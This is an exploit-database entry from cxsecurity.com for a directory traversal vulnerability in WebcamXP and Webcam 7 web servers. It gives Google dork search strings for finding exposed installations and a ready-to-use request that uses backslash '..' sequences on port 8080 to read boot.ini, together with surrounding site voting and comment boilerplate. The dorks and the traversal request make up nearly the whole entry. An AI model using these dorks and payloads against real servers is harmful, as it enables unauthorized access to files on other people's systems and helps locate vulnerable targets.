WebcamXP / Webcam7 Directory Traversal

2012.02.24
Credit: Silent Dream
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability # Google Dork: "powered by webcamxp" xhtml css # Google Dork: "powered by webcam 7" # Date: 2/22/2012 # Author: Silent Dream # Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe # Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe # Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32 # Tested on: Windows XP # Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes. http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini

References:

http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top